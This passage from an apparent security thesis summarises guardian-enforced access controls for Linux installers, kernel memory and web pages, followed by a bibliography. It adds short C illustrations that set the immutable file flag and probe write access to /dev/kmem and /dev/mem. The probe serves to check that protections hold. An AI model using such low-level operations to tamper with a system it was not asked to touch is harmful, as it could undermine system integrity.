In this chapter, we focus on a method for dividing up root file-system privilege to prevent abuse by applications running on the same instance of the operating system, regardless of whether or not that OS happens to be running in a virtual machine. While the practice of an ordinary user installing applications into their home directory avoids root entirely, the application's file-system objects are not protected against modification by other applications the user installs (or indeed, any application the user happens to run).
Ioannidis et al. introduced the concept of sub-operating systems, mark-
ing each file with a label indicating where it came from. These labels restrict what data files an application is allowed to access at a finer granularity than the user. Sub-OS does not explicitly tackle limiting the abuse of root file-system privilege during the process of installing, upgrading, and removing an application. Polaris likewise focuses on application data, restricting what user files an application can access based on user interaction with the window manager.
Fine-grained access control systems, such as SELinux and those imple-
mented by Solaris, restrict an application's permissions based on the labels assigned to both that application and the resources it wishes to use. These systems have the potential to split up root file-system privilege, parallelling the approach used herein. Traditionally, however, such policies have focused on run-time system state (i.e., when the system is being used for day-to-day activities) as opposed to installers and related file-system configuration operations.
In Linux, the default SELinux security policy has dpkg being granted write access to almost every file on the system. Other systems, such as AppArmor,
appear to work best when new applications are not being installed or upgraded. In the current environment where applications are routinely upgraded, not supporting installs or upgrades is a problem.
While projects such as DTE-enhanced UNIX and XENIX restrict
the privileges of root (including root's ability to configure the system), we are unaware of any such privilege systems designed to restrict configuration changes during install, upgrade, or uninstall (i.e., it seems most installers can still be run with such privileges, again still having full access to all file-system objects on disk). For systems using the OpenBSD schg and ext2 immutable flags, any application can be given the ability to change an immutable file – the user can simply be asked to run an application after acquiring sufficient configuration privileges. SVFS protects files on disk but is susceptible to the same problem of inadequate control over installation applications.
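For comparison, the ext2/ext3 immutable flag mentioned above is toggled with a single ioctl by any process holding CAP_LINUX_IMMUTABLE, which is why the flag by itself does not constrain installers run with full configuration privileges. The following is a minimal sketch, not code from the thesis:

    /* set_immutable.c - minimal sketch showing how easily the ext2/ext3
     * immutable flag is set (or cleared) by a sufficiently privileged
     * process, illustrating why the flag alone does not restrict installers. */
    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/ioctl.h>
    #include <unistd.h>
    #include <linux/fs.h>  /* FS_IOC_GETFLAGS, FS_IOC_SETFLAGS, FS_IMMUTABLE_FL */

    int main(int argc, char *argv[])
    {
        if (argc != 2) {
            fprintf(stderr, "usage: %s <file>\n", argv[0]);
            return 1;
        }

        int fd = open(argv[1], O_RDONLY);
        if (fd < 0) {
            perror("open");
            return 1;
        }

        long flags;
        if (ioctl(fd, FS_IOC_GETFLAGS, &flags) < 0) {
            perror("FS_IOC_GETFLAGS");
            return 1;
        }

        flags |= FS_IMMUTABLE_FL;          /* or &= ~FS_IMMUTABLE_FL to clear */
        if (ioctl(fd, FS_IOC_SETFLAGS, &flags) < 0)
            perror("FS_IOC_SETFLAGS");     /* fails without CAP_LINUX_IMMUTABLE */

        close(fd);
        return 0;
    }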
There have been many attempts to detect malicious modifications to system
configuration. Windows File Protection (WFP) maintains a database of specific files which are protected, along with digital signatures of them. WFP is designed, however, to protect against a non-malicious end-user, preventing only accidental system modification. Pennington et al. proposed implementing an intrusion detection system in the storage device to detect suspicious modifications. Strunk et al. proposed logging all file modifications for a period of time to assist in the recovery after malware infection. Tripwire maintains cryptographic hashes of all files in an attempt to detect modifications.
All these proposals detect modifications after the fact. Applications such as registry watchers and clean uninstallers attempt to either detect or revert changes made to a system by an application installer. These systems similarly do not prevent changes in system configuration.
The separation of configuration privileges as proposed in this chapter pre-
vents installers from making unauthorized changes to system state, leading to a proactive rather than reactive approach to limiting system configuration changes. Package managers and the Microsoft installer both limit system configuration actions allowed by packages designed for their system, but do not prevent applications from simply providing their own installer (or install script), bypassing the limits enforced by the package manager.
Final Remarks

The approach discussed in this chapter provides a method for restricting modifications to an application on disk. While updates to the application are allowed, the ability for an application to modify the file-system objects associated with
another application is not allowed. These restrictions bring much-needed additional security to desktops in a world where different applications all share the file-system, and yet may not be trustworthy themselves. The approach does not rely on the end-user for enforcement, protects all applications installed, and is implemented by a guardian (the OS and configd developer). It therefore follows the thesis goal of providing a guardian-enforced mandatory access control mechanism which can be deployed.
Summary and Concluding Remarks
In this thesis, we have proposed four new mandatory access control mechanisms. Each of these mechanisms was designed to be set by a guardian who is able to make security-related decisions. In each approach, the application developers are, by design, not able to directly take control of policy decisions.
Furthermore, end users need not themselves police the mechanism. In not requiring an expert user, we believe the mechanisms will be deployable to a wide audience.
A Summary of the Protection Mechanisms
Many JavaScript-based attacks require that compromised web pages communicate with attacker-controlled web servers. The joint work SOMA restricts cross-domain communication to a web page's originating server and other servers that mutually approve of the cross-site communication. By preventing unapproved cross-domain communication, attacks such as cross-site scripting and cross-site request forgery can be blocked.
SOMA imposes no configuration or usage burden on end users. The policy is
set by guardians, namely the administrators of sensitive web servers and web browser developers. The changes required by SOMA are easy for server administrators to understand, giving them a chance to specify what sites can interact with their content. SOMA is also incrementally deployable with incremental benefit. The limitations of SOMA include that it is not able to restrict communication between JavaScript functions loaded by the browser, it requires buy-in
from browser vendors and site administrators, and it is only able to restrict traffic for web applications which rely on the browser.
Limiting Privileged Processor Permission
The current lack of protection between root-level user control and privileged processor control on a system leads to a situation where it is possible for applications to bypass restrictions enforced on user space processes (even those run with root privileges). As an example, the current ability to prevent root from accessing a FUSE-based file-system can be bypassed by root altering the kernel. Root can also alter the page-table mapping of arbitrary processes by running code with privileged processor control.
The overly permissive rights granted to root have a negative effect on
the system. Both malware and legitimate user space processes have sufficient permission to negatively affect the system. For example, the ability to perform writes to the underlying hard drive of a mounted file-system can lead to users damaging their own file-systems by corrupting critical system files, even though the user is using a non-malicious user space application.
The approaches detailed in this thesis for restricting the ability to run code
with privileged processor control help prevent subversion of mandatory access control policies imposed by the kernel on user space processes – including pre-existing approaches such as SELinux and AppArmor as well as new mechanisms proposed in this thesis such as bin-locking (Chapter ) and configd (Chapter ). The restrictions include locking down raw writes to mounted file-systems and swap, restricting access to kernel memory device files, preventing arbitrary kernel modules from being loaded, and preventing arbitrary modification of the boot loader, kernel, and kernel modules on disk.
While some of the restrictions are previously known and have been deployed by Microsoft on Windows, we focus our analysis on Linux by evaluating a prototype implementation. The implementation discussed in Chapter has a negligible impact on end-user day-to-day use and defends against current malware rootkits.
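One of these restrictions is easy to observe from user space: with the protections enabled, even a root process should be unable to open the kernel memory device files for writing. The probe below is our own illustration, not code from the prototype:

    /* probe_kmem.c - illustrative probe: with the kernel protections described
     * above in place, even a root process should be unable to open the kernel
     * memory device files for writing. */
    #include <errno.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    static void probe(const char *path)
    {
        int fd = open(path, O_WRONLY);
        if (fd < 0) {
            printf("%-12s open for write denied: %s\n", path, strerror(errno));
        } else {
            printf("%-12s WARNING: opened for write\n", path);
            close(fd);
        }
    }

    int main(void)
    {
        probe("/dev/kmem");
        probe("/dev/mem");
        return 0;
    }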
Bin-Locking

When binaries are being installed, the current (almost universal) situation is that the installer has write access to essentially the entire file-system – far too coarse a granularity, from a security-oriented perspective. To address this, we presented bin-locking, a mechanism based on digitally signing software and
extending the kernel to protect binaries on disk against modification by unauthorized software. One of the key features not widely addressed by previous file protection schemes (to our knowledge) is built-in support for software application upgrades. With many applications now receiving regular patches, dealing with upgrades in a smooth and non-intrusive manner is important. The proposed system enforces a separation between binary files belonging to different applications. Even with privileges sufficient to install an application, binary files belonging to one application cannot be modified by an application created by a different developer. While we do not restrict the ability to bin-lock binaries to certain vendors, we suspect that the vendors most interested in the capabilities offered by bin-locking may be those who develop or provide system monitoring utilities and crucial services.
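The bin-locking rule itself is compact: a signed (bin-locked) binary may only be replaced by a file signed with the same key, while unsigned files remain unprotected. The sketch below illustrates only this comparison; the thesis enforces it inside the kernel at write time, and the extended-attribute fingerprint used here is a hypothetical stand-in for the signature embedded in the binary:

    /* binlock_check.c - conceptual sketch of the bin-locking replacement rule:
     * a bin-locked binary may only be replaced by a file signed with the same
     * key as the file already on disk. The signer-key fingerprint is assumed
     * (purely for illustration) to be available via an extended attribute
     * written by a hypothetical signing tool. */
    #include <stdbool.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/xattr.h>

    #define FP_LEN 32  /* e.g. a SHA-256 fingerprint of the signing public key */

    /* Hypothetical helper: fetch the signer-key fingerprint recorded for a
     * file. Returns 0 on success, non-zero if the file is unsigned. */
    static int get_signer_fingerprint(const char *path, unsigned char fp[FP_LEN])
    {
        ssize_t n = getxattr(path, "user.binlock.keyfp", fp, FP_LEN);
        return (n == FP_LEN) ? 0 : -1;
    }

    /* An unsigned file is unprotected; a signed file may only be replaced by
     * a candidate signed with the same key. */
    static bool replacement_allowed(const char *existing, const char *candidate)
    {
        unsigned char old_fp[FP_LEN], new_fp[FP_LEN];

        if (get_signer_fingerprint(existing, old_fp) != 0)
            return true;                    /* not bin-locked */
        if (get_signer_fingerprint(candidate, new_fp) != 0)
            return false;                   /* locked, replacement unsigned */
        return memcmp(old_fp, new_fp, FP_LEN) == 0;
    }

    int main(int argc, char *argv[])
    {
        if (argc != 3) {
            fprintf(stderr, "usage: %s <existing-binary> <candidate>\n", argv[0]);
            return 2;
        }
        bool ok = replacement_allowed(argv[1], argv[2]);
        printf("replacement %s\n", ok ? "allowed" : "denied");
        return ok ? 0 : 1;
    }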
Configd

Configd is a framework for restricting configuration changes, including kernel extensions and an associated user-space daemon. The status quo on end-user operating systems is dangerous – giving every application full access to the file-system during install, upgrade, and removal. We provide the foundation of a full solution including concept, architecture, design, and prototype implementation proving out the design. The design provides a mechanism for reducing root abuse of file-system privileges without breaking normal software operation.
Our end-goal is to eliminate the property whereby every process running
with root privilege can change arbitrary files on disk, as this is commonly abused by malware on current desktop operating systems. A necessary part of this involves restricting the ability for applications to modify each other's file-system objects on disk. Our proposal mitigates the security risks associated with install mechanisms in common use today, wherein software installers (typically downloaded from the Internet) are run as root. The problem addressed herein is long-standing. While the proposal is specific to Linux, we see no reason why a similar approach could not be used on Windows.
Revisiting Thesis Objectives
As stated in Chapter , this thesis focuses on mandatory access control mechanisms which are set by a guardian. All mechanisms introduced in this thesis allow applications to continue to share resources, including the file-system and network. At the same time, the mechanisms introduced enforce a greater iso-
lation of applications, preventing a number of the attacks which have become commonplace in both the desktop and web environments.
We met the constraints stated in the thesis hypothesis (on page ) by designing each of the mandatory access control mechanisms so that it requires little end-user or developer security expertise and results in better overall application security. Each of the four mechanisms discussed was prototyped and tested to confirm that it could be used on current real-world systems. This included testing backwards compatibility (when appropriate), and verifying that the overhead of each mechanism was reasonable.
The mechanisms introduced provide new approaches for restricting the abil-
ities of applications in an effort to better protect software systems against malware.
The new kernel protections introduced for Linux, along with bin-locking and configd, provide three guardian-based access control mechanisms positively answering the thesis question. SOMA provides a fourth guardian-based access control mechanism which further supports our hypothesis. The mechanisms provided answer the stated question, providing four representative mechanisms which fall under the category of MAC policies being enforced by a guardian. We believe MAC policies set by a guardian are an important subset, and we have chosen to formally recognize them as such. The mechanisms we discussed are designed to be implemented by the operating system developer. SOMA is designed to be implemented by the browser developer. By publishing these mechanisms, we draw attention to the guardian subset of mandatory access control policies, satisfying the second goal of our work (on page ).
In this section, we discuss several insights gleaned from developing the mandatory access control mechanisms discussed in this thesis. While our insights and personal views have arisen from our experience, rather than in all cases being directly supported by specific scientific experimentation, we nevertheless offer them to stimulate further discussion and exploration.
1. We believe that the guardian-based access control mechanisms most acceptable to both application developers and users have characteristics common in many other domains, including parenting. Such policies involve both tenderness and firmness towards both users and developers. While we have no proof for such a statement, we believe that environments which are overly restrictive are likely to be disliked by either application developers or users. Furthermore, environments which are too
loosely constrained have led to the current situation in which malware is prevalent on the desktop and in the web environment.
2. We believe that the approach of not depending on application developers
for security enforcement is the only realistic choice to make. Because application developers have various skill sets, it is not prudent to assume that they will all be capable of writing secure software. Furthermore, some application developers actively try to subvert systems by writing malware. To depend on the user to act as security police also appears to be an unwise decision. The vast majority of computer users are not security experts. The approach taken in this thesis is to develop security mechanisms which are designed to be set by a knowledgeable guardian, one well-versed in security and capable of making decisions which benefit both legitimate application developers and users. We believe that in the past, too much trust has been placed in the developer's ability to securely design their applications. We suspect this assumption of trust in the developer led to a scenario where alternate approaches for increasing security were not actively pursued.
3. Computers were initially developed for use by very technically minded
people in solving specific tasks. Developers initially had complete freedom and flexibility in most of their design choices. Developers argue against limitations, preferring instead to retain complete freedom.
This resistance from developers, however, is based on two different arguments, which we believe are non-overlapping. The first is the argument that the developer, as a user, will lose control over the ability to reconfigure the device they own. On this point, we choose not to prevent the owner of the hardware device from ultimately subverting the mandatory access control policies enforced in software. The other point is whether the developer should be allowed to have arbitrary control over others' devices through the software they develop. On this point, we take the side of not allowing the developer total control over others' devices, since malware commonly takes advantage of exactly this ability. In this thesis, we attempt to take away some of the freedom of developers when designing software for others' devices. We attempt to do this without offending too many other parties (i.e., without too many other negative impacts). We do so by creating new MAC policies which are set by a guardian, avoiding many end-user usability problems.
4. The mandatory access controls discussed in this thesis focused on areas
which are often exploited by malware, but seldom used by legitimate software. We chose to focus on exactly these areas in developing manda-
tory access control policies which can be set by a guardian. Had we chosen to implement a more restrictive policy in areas commonly used by legitimate software, we believe we would have encountered significant usability problems. Indeed, many of the guardian-based policies which have already been deployed (including the JavaScript same-origin policy and execute disable) provide significant benefits while having acceptable usability by a non-expert. We believe there are still gains to be made in examining features made available by the application environment and commonly used by malware but not by legitimate software.
5. Both bin-locking and configd took advantage of the common developer
paradigm of code reuse. It is typically considered bad practice for a developer to re-implement someone else's code. One consequence of the paradigm of code reuse is that an individual shared library on disk is not likely to be created by multiple independent parties, a fact that bin-locking and configd used in their design. We believe there may be other guardian-set policies which can be created by examining generally accepted developer design patterns.
Open Problems

In this thesis, we concentrated on preventing one software application from modifying (and thereby harming) another. In the web environment, the SOMA protection mechanism focused on the fetching of external content, since this is the most often used avenue through which attacks are performed. SOMA did not concentrate on those operations which do not require a fetch of content, or those operations which require fetching content from a server which has already been approved through the SOMA process. While the current approaches of further limiting the communication between web applications have been focused on giving the application developers the tools required to protect their applications, we do not believe there has been enough focus placed on how to ensure that these tools are used properly (or indeed, used at all).
We therefore see opportunity for additional guardian-based mandatory access controls which restrict communication between web applications (e.g., SOMA did not handle ad-syndication). We also see opportunity for additional research into generating improved fine-grained policies for web pages (e.g., mashups).
Mutual approval, as discussed in Chapter , provides a mechanism for both
parties to declare their approval for the sharing of information. While SOMA focused on applying this mutual approval mechanism to web applications, we
see an opportunity for additional research into the application of such a policy outside the web context.
On the desktop, our solutions focused solely on preventing an application
from obtaining privileged processor control, and restricting the ability to modify other applications' file-system objects on disk. This thesis did not focus on the problem of how to protect inter-process communication between applications. We believe there is the potential for additional guardian-based mandatory access control policies to be developed which restrict inter-process communication without placing significant additional assumptions on the abilities of either the end-user or application developer.
The desktop-based mandatory access control policies and related mecha-
nisms discussed in this thesis are designed to limit the ability for applications to modify other applications' file-system objects. Another problem which we do not address is that of a Trojan horse application. Such an application is self-contained, not needing to modify other applications on disk in order to carry out its nefarious activities. Bot-net clients which do not attempt to hide on the end-user desktop also fall into the category of not needing to modify other applications installed on the system in order to function. While this work results in malware being kept distinct from other applications on the file-system, it remains an open problem how to prevent application malware from being installed in the first place.
Bibliography

[1] Linux Application Development, chapter 8. Creating and Using Libraries.
Addison-Wesley Professional, 2nd edition, Nov 2004.
[2] F. Adelstein, M. Stillerman, and D. Kozen. Malicious code detection for
open firmware. In Proc. 18th Annual Computer Security ApplicationsConference, pages 403–412, Dec 2002.
[3] Adobe Systems Incorporated. External data not accessible outside a Macromedia Flash movie's domain. Technical Report tn_14213, Adobe Systems Incorporated, Feb 2006.
[4] Alexa top 500 sites. Web Page (viewed 14 Apr 2008).
[5] Android developers. Web site (viewed 18 Nov 2009).
[6] Apple, Inc. iPhone developer program license agreement, Jun 2008.
[8] A. Apvrille, D. Gordon, S. Hallyn, M. Pourzandi, and V. Roy. Digsig: Run-
time authentication of binaries at kernel level. In Proc. 18th USENIXConference on System Administration (LISA), pages 59–66, Nov 2004.
[9] W. A. Arbaugh, D. J. Farber, and J. M. Smith. A secure and reliable boot-
strap architecture. In Proc. 18th IEEE Symposium on Security and Pri-vacy, pages 65–71, May 1997.
[10] M. Balduzzi, M. Egele, E. Kirda, D. Balzarotti, and C. Kruegel. A so-
lution for the automated detection of clickjacking attacks. In Proc. 5thACM Symposium on Information, Computer and Communications Secu-rity, Apr 2010.
[11] A. Baliga, X. Chen, and L. Iftode. Paladin: Automated detection and con-
tainment of rootkit attacks. Technical Report DCS-TR-593, Rutgers Uni-versity Department of Computer Science, Jan 2006.
[12] A. Baliga, P. Kamat, and L. Iftode. Lurking in the shadows: Identifying
systemic threats to kernel data. In Proc. 28th IEEE Symposium on Secu-rity and Privacy, pages 246–251, May 2007.
[13] P. Barham, B. Dragovic, K. Fraser, S. Hand, T. Harris, A. Ho, R. Neuge-
bauer, I. Pratt, and A. Warfield. Xen and the art of virtualization. In Proc.
19th ACM Symposium on Operating Systems Principles, pages 164–177,Oct 2003.
[14] E. G. Barrantes, D. H. Ackley, T. S. Palmer, D. Stefanovic, and D. D. Zovi.
Randomized instruction set emulation to disrupt binary code injectionattacks. In Proc. 10th ACM Conference on Computer and CommunicationSecurity, pages 281–289, Oct 2003.
[15] A. Barth, J. Caballero, and D. Song. Secure content sniffing for web
browsers, or how to stop papers from reviewing themselves. In Proc. 30thIEEE Symposium on Security and Privacy, pages 360–371, May 2009.
[16] A. Barth, C. Jackson, and J. C. Mitchell. Robust defenses for cross-site
request forgery. In Proc. 15th ACM conference on Computer and Com-munications Security, pages 75–88, Oct 2008.
[17] A. Barth, J. Weinberger, and D. Song. Cross-origin JavaScript capability
leaks: Detection, exploitation, and defense. In Proc. 18th USENIX Secu-rity Symposium, Aug 2009.
[18] M. Bauer. Paranoid penguin: an introduction to Novell AppArmor. Linux
Journal, 148:36,38,40–41, Aug 2006.
[19] A. Beautement, M. A. Sasse, and M. Wonham. The compliance budget:
Managing security behaviour in organizations. In Proc. 2008 New Secu-rity Paradigms Workshop, pages 47–58, Sep 2008.
[20] D. Bell and L. LaPadula. Secure computer systems: Mathematical foun-
dations. Technical Report MTR-2547, Vol. 1, MITRE Corporation, Mar1973.
[21] D. Bell and L. LaPadula. Secure computer systems: Unified exposition
and multics interpretation. Technical Report MTR-2545, Rev 1, MITRECorporation, Mar 1975.
[22] A. Bellissimo, J. Burgess, and K. Fu. Secure software updates: Disap-
pointments and new challenges. In USENIX 2006 Workshop on Hot Top-ics in Security (HotSec 2006).
[23] K. Biba. Integrity considerations for secure computer systems. Technical
Report MTR-3153, MITRE Corporation, Apr 1977.
[24] M. Bishop. Computer Security: Art and Science. Addison Wesley, 2003.
[25] H. Bojinov, E. Bursztein, and D. Boneh. Xcs: Cross channel scripting
and its impact on web applications. In Proc. 16th ACM Conference onComputer and Communications Security.
[26] D. Botta, R. Werlinger, A. Gangé, K. Beznosov, L. Iverson, S. Fels, and
B. Fisher. Towards understanding IT security professionals and theirtools. In Proc. 3rd Symposium on Usable Privacy and Security, Jul 2007.
[27] D. Brewer and M. Nash. The chinese wall security policy. In Proc. 10th
IEEE Symposium on Security and Privacy, pages 206–214, May 1989.
[28] G. Brunette. Restricting service administration in the Solaris 10 operat-
ing system. Technical Report 819-2887-10, Sun Microsystems, 2005.
[29] bsign. Web site (viewed 22 Jan 2009).
[30] K. R. B. Butler, S. McLaughlin, and P. D. McDaniel. Rootkit-resistant
disks. In Proc. 15th ACM Conference on Computer and CommunicationsSecurity, pages 403–415, Oct 2008.
[31] J. Cappos, J. Samuel, S. Baker, and J. H. Hartman. A look in the mirror: At-
tacks on package managers. In Proc. 15th ACM Conference on Computerand Communications Security, pages 565–574, Oct 2008.
[32] M. Carbone, W. Cui, L. Lu, W. Lee, M. Peinado, and X. Jiang. Mapping
kernel objects to enable systemic integrity checking. In Proc. 16th ACMConference on Computer and Communications Security, Oct 2009.
[33] CERT. CERT advisory ca-2000-02: Malicious HTML tags embedded in
client web requests. Technical Report CERT Advisory CA-2000-02, CERT,2000.
[34] S. Chen, D. Ross, and Y.-M. Wang. An analysis of browser domain-isolation bugs and a light-weight transparent defense mechanism. In Proc. 14th ACM Conference on Computer and Communications Security, pages 2–11, Oct 2007.
[35] D. Clark and D. Wilson. A comparison of commercial and military security
policies. In Proc. 8th IEEE Symposium on Security and Privacy, pages184–194, May 1987.
[36] R. Coker. Re: [DSE-Dev] refpolicy: domains need access to the apt's pty
and fifos. Mailing List Post, Mar 2008.
[37] J. Collake. Hacking Windows file protection. Web Page, 2007.
[38] Common Weakness Enumeration. 2010 CWE/SANS Top 25 Most Dan-
gerous Programming Errors, Apr 2010.
[39] C. Cowan, P. Wagle, C. Pu, S. Beattie, and J. Walpole. Buffer overflows:
Attacks and defenses for the vulnerability of the decade. In DARPA Infor-mation Survivability Conference and Expo, pages 119–129, Jan 2000.
[40] R. S. Cox, J. G. Hansen, S. D. Gribble, and H. M. Levy. A safety-oriented
platform for web applications. In Proc. 27th IEEE Symposium on Securityand Privacy, pages 350–364, May 2006.
[41] crazylord. Playing with Windows /dev/(k)mem. In Phrack, volume 0x0b
(0x3b), chapter 0x10. Jul 2002.
[42] D. A. Curry. UNIX System Security: A Guide for Users and System Ad-
ministrators. Addison-Wesley, 1992.
[43] S. Dandamudi. Guide to RISC processors for programmers and engi-
neers. Springer, 2005.
[44] G. Davida, Y. Desmedt, and B. Matt. Defending systems against viruses
through cryptographic authentication. In Proc. 10th IEEE Symposium onSecurity and Privacy, pages 312–318, May 1989.
[45] D. W. Davies. The bombe - a remarkable logic machine. Cryptologia,
23(2):108–138, Apr 1999.
[46] D. Dean, E. Felten, and D. Wallach.
Java security: From HotJava to
Netscape and beyond. In Proc. 17th IEEE Symposium on Security andPrivacy, pages 190–200, May 1996.
[47] The Debian GNU/Linux FAQ: Chapter 8 - The Debian Package Manage-
ment Tools, 2008.
[48] S. DeDeo. Pagestats extension. Web Page, May 2006.
[49] D. E. Denning. A lattice model of secure information flow. Communica-
tions of the ACM, 19(2):236–243, 1976.
[50] P. J. Denning. Computers Under Attack: Intruders, Worms, and Viruses,
chapter 17. Computer Viruses, page 290. Addison Wesley, 1990.
[51] D. Dittrich.
"root kits" and hiding files/directories/processes after a
break-in. Web Page, 2002.
[52] B. Dolan-Gavitt, A. Srivastava, P. Traynor, and J. Giffin. Robust signatures
for kernel data structures. In Proc. 16th ACM Conference on Computerand Communications Security, Oct 2009.
[53] EasyDesk Software. Registry watch. Web Page (viewed 23 Apr 2009).
[54] C. Ellison. RFC 2692: SPKI requirements. Technical report, Internet En-
gineering Task Force, Sep 1999.
[55] D. Evans and D. Larochelle.
Improving security using extensible
lightweight static analysis. In IEEE Software, number 1 in 19, pages42–51. IEEE Computer Society, Jan 2002.
[56] "Digital Signature Standard", Federal Information Processing Stan-
dards Publication 186.
Technical report, U.S. Department of Com-
merce/N.I.S.T., National Technical Information Service, 1994.
[57] Fuse: Filesystem in userspace. Web Page (viewed 5 Mar 2010).
[58] E. Gamma, R. Helm, R. Johnson, and J. Vlissides. Design Patterns: Ele-
ments of Reusable Object-Oriented Software. Addison-Wesley, 1995.
[59] T. Garfinkel and M. Rosenblum. A virtual machine introspection based ar-
chitecture for intrusion detection. In Proc. 10th Network and DistributedSystems Security Symposium, pages 191–206, Feb 2003.
[60] I. Goldberg, D. Wagner, R. Thomas, and E. Brewer. A secure environment
for untrusted helper applications (confining the wily hacker). In Proc. 6thUSENIX Security Symposium, Jul 1996.
[61] Google. Android developer guide. Developer Website, 2009.
[62] J. B. Grizzard.
Towards Self-Healing Systems: Re-establishing Trust
in Compromised Systems. PhD thesis, Georgia Institute of Technology,2006.
[63] J. Grossman and T. Niedzialkowski. Hacking intranet websites from the
outside – JavaScript malware just got a lot more dangerous. In BlackhatUSA, Aug 2006.
[64] S. E. Hallyn and A. G. Morgan. Linux capabilities: Making them work. In
Proc. Ottawa Linux Symposium, Jul 2008.
[65] J. Heasman. Implementing and detecting a PCI rootkit. In Blackhat DC,
[67] G. Hoglund and J. Butler.
Rootkits: Subverting the Windows Kernel.
Addison-Wesley Professional, 2005.
[68] J. Howell, C. Jackson, H. Wang, and X. Fan. MashupOS: Operating system
abstractions for client mashups. In Proc. 11th USENIX Workshop on HotTopics in Operating Systems, May 2007.
[69] Intel Corporation. Intel 64 and IA-32 Architectures Software Developer's
Manual Volume 3A: System Programming Guide, Part 1. Number 253668.
Intel, Dec 2009.
[70] S. Ioannidis, S. M. Bellovin, and J. M. Smith. Sub-operating systems: a
new approach to application security. In Proc. 10th Workshop on ACMSIGOPS European Workshop, pages 108–115, Jul 2002.
[71] C. Jackson, A. Barth, A. Bortz, W. Shao, and D. Boneh. Protecting browsers from DNS rebinding attacks. In Proc. 14th ACM Conference on Computer and Communications Security, pages 421–431, Oct 2007.
[72] C. Jackson, A. Barth, A. Bortz, W. Shao, and D. Boneh. Protecting browsers from DNS rebinding attacks. ACM Transactions on the Web, 3(1), 2009.
[73] C. Jackson, A. Bortz, D. Boneh, and J. C. Mitchell. Protecting browser
state from web privacy attacks. In Proc. 15th International Conferenceon World Wide Web, pages 737–744, May 2006.
[74] C. Jackson and H. J. Wang. Subspace: secure cross-domain communica-
tion for web mashups. In Proc. 16th International Conference on WorldWide Web, pages 611–62, May 2007.
[75] I. Jackson and C. Schwarz. Debian Policy Manual, 1998.
[76] T. Jaeger, R. Sailer, and X. Zhang. Analyzing integrity protection in the
SELinux example policy. In Proc. 12th USENIX Security Symposium,pages 59–74, Aug 2003.
[77] M. Jakobsson and Z. Ramzan. Crimeware: Understanding New Attacks
and Defenses. Addison-Wesley Professional, 2008.
[78] N. Jovanovic, E. Kirda, and C. Kruegel. Preventing cross site request
forgery attacks. In Proc. 2nd IEEE Conference on Security and Privacyin Communication Networks, Aug 2006.
[79] C. Karlof, J. Tygar, D. Wagner, and U. Shankar. Dynamic pharming attacks
and locked same-origin policies for web browsers. In Proc. 14th ACMConference on Computer and Communications Security, pages 58–71,Oct 2007.
[80] K. Kato and Y. Oyama. Softwarepot: An encapsulated transferable file
system for secure software circulation. In Proc. of International Sympo-sium on Software Security, volume Lecture Notes in Computer Science2609/2003, pages 217–224, 2003.
[81] B. Kauer. Oslo: Improving the security of trusted computing. In Proc.
16th USENIX Security Symposium, pages 229–237, Aug 2007.
[82] G. S. Kc, A. D. Keromytis, and V. Prevelakis. Countering code-injection at-
tacks with instruction-set randomization. In Proc. 10th ACM Conferenceon Computer and Communication Security, pages 272–280, Oct 2003.
[83] K. Keahey, K. Doering, and I. Foster. From sandbox to playground: Dy-
namic virtual environments in the grid. In Proc. Fifth IEEE/ACM Interna-tional Workshop on Grid Computing, pages 34–42, Nov 2004.
[84] J. Keith. DOM Scripting: Web Design With JavaScript and the Document
Object Model, chapter 3. The Document Object Model. Springer-Verlag,2005.
[85] A. Kim.
Apple's ability to deactivate malicious app store apps.
[86] G. H. Kim and E. H. Spafford. Experiences with Tripwire: Using integrity
checkers for intrusion detection. Technical Report CSD-TR-93-071, Pur-due University, 1993.
[87] G. H. Kim and E. H. Spafford. The design and implementation of Trip-
wire: A file system integrity checker. In Proc. 2nd ACM Conference onComputer and Communications Security, pages 18–29, Oct 1994.
[88] S. T. King, J. Tucek, A. Cozzie, C. Grier, W. Jiang, and Y. Zhou. Designing
and implementing malicious hardware. In Proc. 1st USENIX Workshopon Large-Scale Exploits and Emergent Threats, Apr 2008.
[89] E. Kirda, C. Kruegel, G. Vigna, and N. Jovanovic. Noxes: A client-side
solution for mitigating cross site scripting attacks. In Proc. 21st ACMSymposium on Applied Computing, pages 330–337, Apr 2006.
[90] A. Kjeldaas.
Linux capability FAQ v0.1.
Mailing List Post, Aug
[91] D. V. Klein. Defending against the wily surfer — web-based attacks and
defenses. In Proc. 1st USENIX Workshop on Intrusion Detection andNetwork Monitoring, pages 9–21, Apr 1999.
[92] Knoppix Linux. Web Page (viewed 15 Dec 2008).
[93] Y. Korff, P. Hope, and B. Potter. Mastering FreeBSD and OpenBSD Secu-
rity, chapter 2.1.2. O'Reilly, 2005.
[94] D. Kristol and L. Montulli. RFC2109: HTTP state management mech-
anism. Technical report, Internet Engineering Task Force, Feb 1997.
[95] D. Kristol and L. Montulli. RFC2965: HTTP state management mech-
anism. Technical report, Internet Engineering Task Force, Oct 2000.
[96] G. Kroah-Hartman. Signed kernel modules. Linux Journal, 117:48–53,
[97] I. Krsul and E. H. Spafford. Authorship analysis: Identifying the author
of a program. Computers & Security, 16(3):233–257, 1997.
[98] C. Kruegel, W. Robertson, and G. Vigna. Detecting kernel-level rootkits
through binary analysis. In Proc. 20th Annual Computer Security Appli-cations Conference, pages 91–100, Dec 2004.
[99] V. T. Lam, S. Antonatos, P. Akritidis, and K. G. Anagnostakis. Puppetnets:
misusing web browsers as a distributed attack infrastructure. In Proc.
13th ACM Conference on Computer and Communications Security, pages221–234, Oct 2006.
[100] Programming language popularity.
Web Page, Jan 2010.
[101] Q. Liu, R. Safavi-Naini, and N. P. Sheppard. Digital rights management
for content distribution. In Proc. Australasian Information Security Work-shop Conference on ACSW Frontiers, volume 21, pages 49–58, 2003.
[102] P. Loscocco and S. Smalley. Integrating flexible support for security poli-
cies into the Linux operating system. In Proc. FREENIX Track: USENIXAnnual Technical Conference, pages 29–42, Jun 2001.
[103] M. T. Louw and V. Venkatakrishnan. Blueprint: Robust prevention of
cross-site scripting attacks for existing web browsers. In Proc. 30th IEEESymposium on Security and Privacy, pages 331–346, May 2009.
[104] R. Love. Linux Kernel Development. Novell Press, second edition, 2005.
[105] G. Maone. NoScript - JavaScript/Java/Flash blocker for a safer Firefox
experience! Web page (viewed 14 Apr 2008).
[106] G. Maone. Hardening the web with NoScript. ;Login: The USENIX Mag-
azine, 34(6):21–27, 2009.
[107] B. McCarty.
SELinux: NSA's Open Source Security Enhanced Linux.
O'Reilly Media, Inc., 2004.
